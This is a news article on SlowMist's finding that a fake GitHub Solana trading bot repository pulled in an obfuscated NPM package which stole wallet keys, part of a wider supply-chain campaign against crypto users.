A GitHub repository, deceptively posing as a legitimate Solana trading bot, has been exposed for reportedly concealing crypto-stealing malware. According to a recent report by blockchain security firm SlowMist, the now-deleted “solana-pumpfun-bot” repository, hosted by the account “zldp2002,” mimicked a real open-source tool with the intent of harvesting user credentials. SlowMist initiated its investigation after a user reported that their funds had been stolen, highlighting the immediate impact of this sophisticated digital deception on unsuspecting cryptocurrency holders.

Artificial Popularity and Code Irregularities

The malicious GitHub repository in question exhibited a “relatively high number of stars and forks,” a common tactic used by threat actors to create an illusion of legitimacy and widespread adoption. However, SlowMist’s analysis revealed significant irregularities: all code commits across its directories were made approximately three weeks prior to the discovery, with a distinct lack of consistent patterns that would typically characterize a genuine, actively developed project. These inconsistencies served as crucial indicators of the repository’s fraudulent nature, despite its artificially inflated popularity metrics.

Obscured Malware in a Suspicious NPM Package

The fraudulent project was built using Node.js and leveraged a third-party package named “crypto-layout-utils” as a dependency. Upon further inspection, SlowMist discovered that this particular package had already been removed from the official NPM registry, raising immediate suspicions. Further investigation revealed that the attacker was downloading this library from a separate, hidden GitHub repository. Analysis of the package confirmed it was heavily obfuscated using a tool called jsjiami.com.v7, making its malicious intent harder to decipher. Once de-obfuscated, researchers confirmed it was indeed a malicious package designed to scan local files for wallet-related content or private keys and then upload them to a remote server.

Beyond a Single Repository: A Network of Deception

SlowMist’s ongoing investigation uncovered that the attacker likely controlled a broader network of GitHub accounts. These interconnected accounts were utilized to fork legitimate projects into malicious variations, effectively distributing malware while simultaneously inflating fork and star counts to enhance their deceptive appearance. Multiple forked repositories exhibited similar malicious features, with some versions incorporating another suspicious package, “bs58-encrypt-utils-1.0.3.” This package was reportedly created on June 12, leading SlowMist researchers to believe that this date marked the beginning of the attacker’s widespread distribution of malicious NPM modules and Node.js projects.

A Growing Trend in Software Supply Chain Attacks

This incident represents the latest in a concerning series of software supply chain attacks specifically targeting cryptocurrency users. In recent weeks, similar schemes have been observed, including those that have targeted Firefox users with fake wallet extensions designed to steal credentials. Additionally, other malicious actors have utilized GitHub repositories as hosts for credential-stealing code, underscoring a growing trend where cybercriminals are exploiting trusted platforms and development tools to distribute malware. This method of attack is particularly insidious as it leverages the inherent trust users place in open-source communities and widely used development platforms.

The Stealthy Nature of In-Browser Malware

Unlike traditional phishing scams that rely on fake websites or deceptive emails, these types of malicious browser extensions and code operate directly within the user’s browser environment. This in-browser operation makes them significantly more challenging to detect or block using conventional endpoint security tools, which are often designed to identify external threats. The “low-effort, high-impact approach” of these attacks allows the perpetrators to maintain an expected user experience while simultaneously reducing the chances of immediate detection, enabling them to persist undetected for longer periods and maximize their illicit gains from unsuspecting victims.

User Vigilance and Platform Security are Crucial

The proliferation of such sophisticated scams underscores the critical importance of user vigilance and continuous enhancements in platform security. Cryptocurrency users are strongly advised to exercise extreme caution when downloading and installing any software, especially from open-source repositories or unfamiliar sources. Verifying the legitimacy of developers, scrutinizing code for unusual patterns, and utilizing robust cybersecurity practices are essential. Furthermore, platforms like GitHub and browser extension stores must continually refine their detection mechanisms to identify and remove malicious content swiftly, safeguarding the broader digital ecosystem from these evolving threats.